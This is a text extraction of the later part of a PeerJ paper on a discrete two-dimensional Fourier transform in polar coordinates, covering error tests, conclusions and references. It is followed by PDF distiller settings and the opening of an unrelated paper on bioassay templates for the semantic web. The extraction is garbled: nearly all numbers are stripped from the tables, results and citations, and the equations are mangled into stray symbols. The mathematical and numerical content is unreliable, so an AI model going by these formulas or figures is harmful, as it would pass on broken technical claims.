emax. = − . emax. = − . emax. = − . emax. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . emax. = − . emax. = − . emax. = − . emax. = − . emax. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . emax. = − . emax. = − . emax. = − . emax. = − . emax. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . emax. = − . emax. = − . emax. = − . emax. = − . emax. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ performing sequential d-dft and d-idft results in e ¼ : � e� where e is calculated with eq. ( ). therefore, performing sequential forward and inverse transforms does not add much error. four-term sinusoid & sinc function the second function chosen for evaluation is given by f ðr; uÞ ¼ sinðarÞ ar ½ sinðuÞ þ sinð uÞ þ cosð uÞ þ sinð uÞ� ( ) which is a sinc function in the radial direction and a four-term sinusoid in the angular direction. the graphs for the original function and the magnitude of its continuous d-ft with a ¼ are shown in fig. . from fig. , the function can be considered as a band- limited function. therefore eqs. ( ) and ( ) were used to implement the forward and inverse transform. the continuous d-ft can be calculated from baddour ( ) fðr; cÞ ¼ x n¼� pi�neinc z fnðrÞjnðrrÞrdr ( ) where fnðrÞ is the fourier series of f ðr; uÞ and can be written as fnðrÞ ¼ p zp �p f ðr; uÞe�inudu ( ) figure error trend between the sampled values of the continuous inverse transform and the discretely calculated values for a gaussian function, as a function of n . full-size doi: . /peerj-cs. /fig- yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ from the sampling theorem for the angular direction, the highest angular frequency in eq. ( ) results in n being at least required to reconstruct the signal. therefore, at least terms are required to calculate the continuous d-ft, which can be written as fðr;cÞ¼ pcosð cÞr a ffiffiffiffiffiffiffiffiffiffiffiffiffi a �r p ðaþ ffiffiffiffiffiffiffiffiffiffiffiffiffi a �r p Þ ; r, a � pisinðcÞ ar ffiffiffiffiffiffiffiffiffiffiffiffiffi r þa p þ pisin arcsin a r � �� � sinð cÞffiffiffiffiffiffiffiffiffiffiffiffiffi r þa p � psin arcsin a r � �� � cosð cÞffiffiffiffiffiffiffiffiffiffiffiffiffi r þa p þ pisin arcsin a r � �� � sinð cÞffiffiffiffiffiffiffiffiffiffiffiffiffi r þa p ; r.a >>>>>>>>>>>>>< >>>>>>>>>>>>>: ( ) in the angular direction, the highest frequency term in the function in the space domain is sinð uÞ. from the sampling theorem, the sampling frequency should be at least twice that of the highest frequency present in the signal. thus, n ¼ is chosen in order to go a little past the minimum requirement of . in the radial direction, from the graphs of the original function and its d-ft, it can be assumed that f ðr; uÞ is space-limited at r ¼ and band-limited at wr ¼ . however, since most of the energy in the space domain is located at the origin, a relatively large band limit should be chosen based on the discussion in “conclusion”. therefore, wr ¼ , n ¼ are chosen. forward transform the error results for the forward d-dft of four-term sinusoid & sinc function with wr ¼ , n ¼ are shown in fig. . the discrete transform does not approximate the continuous transform very well. this is expected because the function in the frequency domain is discontinuous and the sampling points close to the discontinuity will result in a very large error. the maximum value of the error is errormax ¼ : db figure plots of the (a) original function (four-term sinusoid and sinc) and (b) the magnitude of its continuous forward d fourier transform with a = . full-size doi: . /peerj-cs. /fig- yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and this occurs where the discontinuities are located. the average of the error is erroraverage ¼ � : db. with wr ¼ , n ¼ , table shows the errors with respect to different value of n and n , from which figs. and show the trend. from fig. , increasing n alone tends improve the average error. the maximum error does not change with n , which is reasonable because of the discontinuity of the function in the frequency domain. from fig. , increasing n leads to errormax and erroraverage first improving and then worsening. this is reasonable because when n is less than the minimum requirement of from sampling theorem, the test result is actually affected by both sampling point density (from the sampling theorem) and grid coverage (discussed in “conclusion”). figure error results for the forward d fourier transform of the four-term sinusoid & sinc function for wp = and n = . full-size doi: . /peerj-cs. /fig- table error (db) of the forward transform of ‘four-term sinusoid & sinc’ function with different value of n and n of forward transform. n n emax. = . emax. = . emax. = . emax. = . emax. = . eavg. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . emax. = . emax. = . emax. = . emax. = . emax. = . eavg. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . emax. = . emax. = . emax. = . emax. = . emax. = . eavg. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . emax. = . emax. = . emax. = . emax. = . emax. = . eavg. = − . eavg. = . eavg. = − . eavg. = − . eavg. = − . emax. = . emax. = . emax. = . emax. = . emax. = . eavg. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ increasing n should give better results from the point of view of the sampling theorem but worse grid coverage. the result from the combined effects is dependent on the function properties. in the specific case of this function, when n is bigger than , thereby figure error trend between the sampled values of the continuous forward transform and the discretely calculated values for a four-term sinusoid and sinc as a function of n . full-size doi: . /peerj-cs. /fig- figure error trend between the sampled values of the continuous forward transform and the discretely calculated values for a four-term sinusoid and sinc as a function of n . full-size doi: . /peerj-cs. /fig- yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ implying that the angular sampling theorem has been satisfied—the results get worse with increasing n . inverse transform the error results for the d-idft of four-term sinusoid & sinc function with wr ¼ , n ¼ are shown in fig. . the maximum value of the error is errormax ¼ � : db. the average of the error is erroraverage ¼ � : db. with wr ¼ , n ¼ , table shows the errors with respect to different value of n and n , from which figs. and show the trend. figure error results for the d inverse discrete fourier transform of the four-term sinusoid and sinc function for wp = and n = . full-size doi: . /peerj-cs. /fig- table error (db) of inverse transform of ‘four-term sinusoid & sinc’ function with different value of n and n . n n emax. = . emax. = . emax. = . emax. = . emax. = . eavg. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . emax. = . emax. = . emax. = . emax. = . emax. = . eavg. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . emax. = − . emax. = − . emax. = − . emax. = − . emax. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . emax. = − . emax. = − . emax. = − . emax. = − . emax. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . emax. = . emax. = . emax. = . emax. = . emax. = . eavg. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ from fig. , it can be observed that the increasing n alone improves the average error, as was expected. however, n ¼ gives an apparently worse average error than the other points. this could be caused by the discontinuity of the function in the frequency figure error trend between the sampled values of the continuous inverse transform and the discretely calculated values for a four-term sinusoid and sinc function, as a function of n . full-size doi: . /peerj-cs. /fig- figure error trend between the sampled values of the continuous inverse transform and the discretely calculated values for a four-term sinusoid and sinc function, as a function of n . full-size doi: . /peerj-cs. /fig- yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ domain. changing to n ¼ , the average error becomes − . db which proves that the large error is caused by the discontinuity. from fig. , increasing n does not lead to worse results, which is different from previous cases. however, from fig. it can be seen that the function in the frequency domain does not have much information in the center area. so, even though increasing n causes a larger hole in the center as discussed in “conclusion”, it does not lead to losing much energy which explains why fig. shows a different trend from the previous cases. performing d-dft and d-idft sequentially results in e ¼ : � e� where e is calculated by eq. ( ). four-term sinusoid and modified exponential for the next test function, the function is given by f ðr; uÞ ¼ e �ar r ½ sinðuÞ þ sinð uÞ þ cosð uÞ þ sinð uÞ� ( ) its continuous d-ft can be calculated as fðr; cÞ ¼ � pi sinðcÞ ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi r þ a p � a r ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi r þ a p þ pi sinð cÞ ð ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi r þ a p � aÞ r ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi r þ a p � p cosð cÞ ð ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi r þ a p � aÞ r ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi r þ a p þ pi sinð cÞ ð ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi r þ a p � aÞ r ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi r þ a p ( ) the graphs for the original function and the magnitude of its continuous d-ft with a = . are shown in fig. . from fig. , it can be observed that the function has a spike in both domains, which is a more difficult scenario based on the discussion in “conclusion”. in this case, the function can be assumed as space-limited or band-limited. this function will be tested as being space-limited. figure plots for (a) the original function and (b) the magnitude of its continuous d discrete fourier transform with a = . for a four-term sinusoid and modified exponential function. full-size doi: . /peerj-cs. /fig- yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. from graph of the original function and its d-dft, it can be assumed that f ðr; uÞ is effectively space-limited with r ¼ , and fðr; cÞ is effectively band-limited with wr ¼ , which gives j n � . this results in n ¼ : however, since the function explodes at the center area in both domains, relatively large values of r and wr should give a better approximation. therefore, another case with r ¼ , wr ¼ is tested. in this case, n ¼ is chosen. in the angular direction, the highest frequency term is sinð uÞ. from the sampling theorem, the sampling frequency should be at least twice of the highest frequency of signal. thus, n ¼ is chosen. forward transform here, the function is tested as a space limited function and eqs. ( ) and ( ) are used to proceed with the forward and inverse transform in sequence. the error results with r ¼ ; wr ¼ ; n ¼ are shown in fig. . the maximum value of the error is errormax ¼ � : db and this occurs at the center area. the average of the error is erroraverage ¼ � : db. this demonstrates that the discrete function approximates the sampled values of the continuous function quite well. inverse transform the error results with r ¼ ; wr ¼ ; n ¼ are shown in fig. . the maximum value of the error is errormax ¼ : db and this occurs at the center. the average of the error iserroraverage ¼ � : db. performing d-dft and d-idft results in e ¼ : � e� , where e is calculated by eq. ( ). figure error between the sampled values of the continuous forward transform and the discretely calculated values for the four-term sinusoid and modified exponential function with r = , wp = and n = . full-size doi: . /peerj-cs. /fig- yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. it can be observed that even for functions with the worst properties, the proposed transform can still be used to approximate the continuous ft with fairly small errors, as long as the function is sampled properly. summary and conclusion accuracy and precision of the transform the proposed discrete d-ft in polar coordinates demonstrates an acceptable accuracy in providing discrete estimates to the continuous ft in polar coordinates. in baddour & chouinard ( ), guizar-sicairos & gutiérrez-vega ( ) and higgins & munson ( ), the one dimensional hankel transform of a sinc function showed similar dynamic error, which could be used as a comparative measure. since the dht is one step of the proposed discrete d-ft, and the definition of the hankel transform is based on abbas, sun & foroosh ( ), a similar dynamic error should be expected. the test cases showed that the transform introduced very small errors (e ¼ : � e� for worst case) by performing a forward transform and an inverse figure error between the sampled values of the continuous inverse transform and the discretely calculated values for the four-term sinusoid and modified exponential function with r = , wp = and n = . full-size doi: . /peerj-cs. /fig- table computing time of three cases: case : run the transform as matrixes in matrix without pre-calculating the bessel zeros; case : run the transform as dft, dht and idft in sequence without pre-calculating the bessel zeros; case : run the transform as dft, dht. test cases total computing time (s) case , . case . case . yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. transform sequentially, which demonstrates that the discrete transform shows good precision. guidelines of choosing sample size as discussed in “conclusion” and proved by test cases, the sample size n (sample size in the radial direction) and n (sample size in the angular direction) do not have to be of the same order. for functions with different properties, sample size in the different directions could be very different. to approximate the continuous ft properly, sample size should be chosen based on the discussion in “conclusion”. interpretation of the transform by interpreting the transform as a ddft, d dht and d idft, the computing time of the transform is improved to a useful level since the fft can be used to compute the dft. appendix: improving the computing time of the transform one of the advantages of the traditional ft is that the computing speed is fast by using the now well-established fft algorithm. to reduce the computing time of the d dft in polar coordinates, the following steps are recommended: . interpreting the transform as three sequential operations (dft, dht, idft) instead of a single four-dimensional matrix. . pre-calculating and saving the bessel zeros. reducing computing time by interpreting the transform as three operations in sequence as explained above, the essence of the transform is that the matrix fpk is transformed into the matrix fql. the intuitive way to interpret the transform kernel is to think of it as a four-dimensional matrix or matrices in a matrix. however, interpreting the transform as a d-dft of each column, a d-dht of each row and then a d-idft of each column makes it possible to use the matlab built in functions fft and ifft, which significantly reduced the computational time. reduce computing time by pre-calculating the bessel zeros after defining the transform as three operations in sequence and using the matrix for the dht defined in lozier ( ), it was found that a lot of computational time was used to calculate the bessel zeros for every different test case, even though the bessel zeros are the same in every case. pre-calculating the bessel zeros and storing the results for large numbers of n and n saves a lot of time. table shows the computing time of a forward transform on the same computer (processor: intel(r) core(tm) i - hq cpu, ram: gb) for three cases: . evaluate the transform as matrices in a matrix without pre-calculating the bessel zeros. . evaluate the transform as a dft, dht and idft in sequence without pre-calculating the bessel zeros. yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. . evaluate the transform as a dft, dht and idft in sequence with pre-calculating the bessel zeros. the gaussian function was used as the test function therefore n ¼ and n ¼ . from table , it can be clearly observed that the computing time by running the transform as matrices in a matrix costs , . s, which is not acceptable for the transform to be useful. testing the transform as three operations turns , . s into . s. this is much better. finally, pre-calculating the bessel zeros makes the transform much faster and applicable. additional information and declarations funding this work was financially supported by the natural sciences and engineering research council of canada, grant number rgpin- - . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: natural sciences and engineering research council of canada: rgpin- - . competing interests the authors declare that they have no competing interests. author contributions � xueyang yao performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � natalie baddour conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: sample matlab code is available as a supplemental file. references abbas sa, sun q, foroosh h. . an exact and fast computation of discrete fourier transform for polar and spherical grid. ieee transactions on signal processing ( ): – doi . /tsp. . . averbuch a, coifman rr, donoho dl, elad m, israeli m. . fast and accurate polar fourier transform. applied and computational harmonic analysis ( ): – doi . /j.acha. . . . baddour n. . two-dimensional fourier transforms in polar coordinates. advances in imaging and electron physics : – . yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /tsp. . http://dx.doi.org/ . /j.acha. . . https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. baddour n. . the discrete hankel transform. in: nikolic g, ed. fourier transforms: century of digitalization and increasing expectations. london: intechopen. baddour n. . discrete two-dimensional fourier transform in polar coordinates part i: theory and operational rules. mathematics ( ): doi . /math . baddour n, chouinard u. . theory and operational rules for the discrete hankel transform. journal of the optical society of america a ( ): – doi . /josaa. . . baddour n, chouinard u. . matlab code for the discrete hankel transform. journal of open research software ( ): doi . /jors. . bracewell r. . the fourier transform and its applications. new york: mcgraw-hill. cooley jw, tukey jw. . an algorithm for the machine calculation of complex fourier series. mathematics of computation ( ): – doi . /s - - - - . dutt a, rokhlin v. . fast fourier transforms for nonequispaced data. siam journal on scientific computing ( ): – doi . / . dutt a, rokhlin v. . fast fourier transforms for nonequispaced data, ii. applied and computational harmonic analysis ( ): – doi . /acha. . . fahimian bp, zhao y, huang z, fung r, mao y, zhu c, khatonabadi m, demarco jj, osher sj, mcnitt-gray mf, miao j. . radiation dose reduction in medical x-ray ct via fourier- based iterative reconstruction. medical physics ( ): doi . / . . fenn m, kunis s, potts d. . on the computation of the polar fft. applied and computational harmonic analysis ( ): – doi . /j.acha. . . . fessler ja, sutton bp. . nonuniform fast fourier transforms using min–max interpolation. ieee transactions on signal processing ( ): – doi . /tsp. . . fourmont k. . non-equispaced fast fourier transforms with applications to tomography. journal of fourier analysis and applications ( ): – doi . /s - - - . guizar-sicairos m, gutiérrez-vega jc. . computation of quasi-discrete hankel transforms of integer order for propagating optical wave fields. journal of the optical society of america a ( ): – doi . /josaa. . . higgins w, munson d jr. . an algorithm for computing general integer-order hankel transforms. ieee transactions on acoustics speech and signal processing ( ): – . lee e, fahimian bp, iancu cv, suloway c, murphy ge, wright er, castaño-díez d, jensen gj, miao j. . radiation dose reduction and image enhancement in biological imaging through equally-sloped tomography. journal of structural biology ( ): – doi . /j.jsb. . . . lewitt rm, matej s. . overview of methods for image reconstruction from projections in emission computed tomography. proceedings of the ieee ( ): – doi . /jproc. . . lozier dw. . nist digital library of mathematical functions. annals of mathematics and artificial intelligence ( – ): – doi . /a: . plonka g, potts d, steidl g, tasche m. . numerical fourier analysis. basel: birkhäuser. potts d, steidl g, tasche m. . fast fourier transforms for nonequispaced data: a tutorial. in: benedetto jj, ferreira pjsg, eds. modern sampling theory: mathematics and applications. boston: birkhäuser boston, – . poularikas ad. . transforms and applications handbook. third edition. boca raton: crc press. yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /math http://dx.doi.org/ . /josaa. . http://dx.doi.org/ . /jors. http://dx.doi.org/ . /s - - - - http://dx.doi.org/ . / http://dx.doi.org/ . /acha. . http://dx.doi.org/ . / . http://dx.doi.org/ . /j.acha. . . http://dx.doi.org/ . /tsp. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /josaa. . http://dx.doi.org/ . /j.jsb. . . http://dx.doi.org/ . /jproc. . http://dx.doi.org/ . /a: https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. scott mc, chen c-c, mecklenburg m, zhu c, xu r, ercius p, dahmen u, regan bc, miao j. . electron tomography at . -ångström resolution. nature ( ): doi . /nature . shannon ce. . communication in the presence of noise. proceedings of the ieee ( ): – doi . /proc. . . stark h. . sampling theorems in polar coordinates. journal of the optical society of america ( ): – doi . /josa. . . stark h, wengrovitz m. . comments and corrections on the use of polar sampling theorems in ct. ieee transactions on acoustics, speech, and signal processing ( ): – doi . /tassp. . . xu y, feng d, wang lv. . exact frequency-domain reconstruction for thermoacoustic tomography. i. planar geometry. ieee transactions on medical imaging ( ): – doi . /tmi. . . yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /nature http://dx.doi.org/ . /proc. . http://dx.doi.org/ . /josa. . http://dx.doi.org/ . /tassp. . http://dx.doi.org/ . /tmi. . https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. discrete two dimensional fourier transform in polar coordinates part ii: numerical computation and approximation of the continuous transform ... introduction definition of the discrete d ft in polar coordinates discrete transform to approximate the continuous transform discretization points and sampling grid numerical computation of the transform numerical evaluation of the d dft in polar coordinates to approximate the continuous ft summary and conclusion appendix: improving the computing time of the transform references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice bioassay templates for the semantic web bioassay templates for the semantic web alex m. clark, nadia k. litterman, janice e. kranz, peter gund, kellan gregory and barry a. bunin collaborative drug discovery, inc., burlingame, ca, united states of america abstract annotation of bioassay protocols using semantic web vocabulary is a way to make experiment descriptions machine-readable. protocols are communicated using concise scientific english, which precludes most kinds of analysis by software algorithms. given the availability of a sufficiently expressive ontology, some or all of the pertinent information can be captured by asserting a series of facts, expressed as semantic web triples (subject, predicate, object). with appropriate annotation, assays can be searched, clustered, tagged and evaluated in a multitude of ways, analogous to other segments of drug discovery informatics. the bioassay ontology (bao) has been previously designed for this express purpose, and provides a layered hierarchy of meaningful terms which can be linked to. currently the biggest challenge is the issue of content creation: scientists cannot be expected to use the bao effectively without having access to software tools that make it straightforward to use the vocabulary in a canonical way. we have sought to remove this barrier by: ( ) defining a bioassay template (bat) data model; ( ) creating a software tool for experts to create or modify templates to suit their needs; and ( ) designing a common assay template (cat) to leverage the most value from the bao terms. the cat was carefully assembled by biologists in order to find a balance between the maximum amount of information captured vs. low degrees of freedom in order to keep the user experience as simple as possible. the data format that we use for describing templates and corresponding annotations is the native format of the semantic web (rdf triples), and we demonstrate some of the ways that generated content can be meaningfully queried using the sparql language. we have made all of these materials available as open source (http://github.com/cdd/ bioassay-template), in order to encourage community input and use within diverse projects, including but not limited to our own commercial electronic lab notebook products. subjects bioinformatics, computational biology, human-computer interaction, data science keywords assay protocols, semantic web, bioassay ontology, common assay template, machine learning introduction one of the major problems currently being faced by biologists charged with the task of performing experimental assays on pharmaceutically interesting molecules is the information burden involved with handling collections of assay descriptions. individual laboratories may carry out hundreds or even thousands of screening experiments each year. each of these experiments involves a protocol, and any two experiments may be identical, similar, or completely different. the typical practice for describing bioassay protocols, for both external communication and internal record keeping, how to cite this article clark et al. ( ), bioassay templates for the semantic web. peerj comput. sci. :e ; doi . /peerj-cs. submitted january accepted april published may corresponding author alex m. clark, aclark.xyz@gmail.com academic editor harry hochheiser additional information and declarations can be found on page doi . /peerj-cs. copyright clark et al. distributed under creative commons cc-by . http://github.com/cdd/bioassay-template http://github.com/cdd/bioassay-template http://dx.doi.org/ . /peerj-cs. mailto:aclark.�xyz@�gmail.�com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ is to use concise scientific english, which is the most universally human readable method of communication, assuming the recipient is familiar with the relevant jargon. unfortunately this method is not scalable. even given the availability of an expert, it is often quite difficult and time-consuming to read two assay description paragraphs and provide a metric for the degree to which two protocols differ. there are many workflow scenarios where comparison of protocols is necessary, e.g. searching through a collection of previous experiments, or making a judgment call as to whether two batches of small molecule measurements are comparable. attempting to use software to assist with such tasks, when the substrate is unconstrained text, results in solutions that are crude at best. while these issues with scalability could be described as a relatively minor nuisance in a small laboratory, the field of drug discovery has lately been undergoing a renaissance of open data (clark, williams & ekins, ; hersey, senger & overington, ; ecker & williams-jones, ; williams, wilbanks & ekins, ). services such as pubchem provide a truly massive resource (helal et al., ); pubchem alone provides more than a million unique bioassay descriptions, and is growing rapidly (bolton, ). such data are supplemented by carefully curated resources like chembl (gaulton et al., ), which are much smaller but have strict quality control mechanisms in place. what these services have in common is that their bioassay protocols have very little machine- readable content. in many cases, information about the target, and the kind and units of the measurements, have been abstracted out and represented in a marked up format, but all of the remaining particulars of the protocol are ensconced within english grammar, if at all. in order to address this problem, the bioassay ontology (bao) was devised (abeyruwan et al., ; vempati et al., ). the bao, which includes relevant components from other ontologies, is a semantic web vocabulary that contains thousands of terms for biological assay screening concepts, arranged in a series of layered class hierarchies. the bao is extensive and detailed, and easily extensible. the vocabulary is sufficiently expressive to be used for describing biological assays in a systematic way, yet it has seen limited use. influential projects such as pubchem (kim et al., ), chembl (willighagen et al., ), bard (de souza et al., ) and openphacts (williams et al., ) make use of the ontology, but the level of description in each is shallow, using only a small fraction of the terms. there are a number of factors holding back scientists from using the bao and related ontologies to describe their assays in detail, with perhaps the most substantial being the lack of software that makes the annotation process fast and convenient. because it is based on the semantic web, bao concepts are expressed as triples, of the form [subject, predicate, object]. there are no hard rules about how this is applied, which is a characteristic of the semantic web, and is both an asset and a liability. the simplest way to consider annotating a particular feature of an assay, e.g. the biological process, is to compose a triple of a form such as [assay id, biological process, viral genome replication]. each of these three fields is a uniform resource indicator (uri), which points to a globally unique object with established meaning. in this case, assay id would it should be noted that the majority of the first million pubchem assays do not contain detailed experimental assay descriptions. contributors such as the broad institute and organizations affiliated with the molecular libraries screening center can be selected by browsing the sources: http://pubchem. 